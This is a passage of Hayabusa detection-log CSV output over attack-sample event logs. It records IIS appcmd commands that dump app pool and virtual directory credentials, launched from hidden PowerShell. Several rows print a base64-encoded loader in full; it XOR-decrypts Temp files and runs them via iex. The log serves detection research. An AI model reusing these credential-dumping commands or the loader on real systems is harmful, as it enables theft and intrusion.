""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file 
due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: 
C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgAC
QAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS 
APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.204 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". 
)"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as 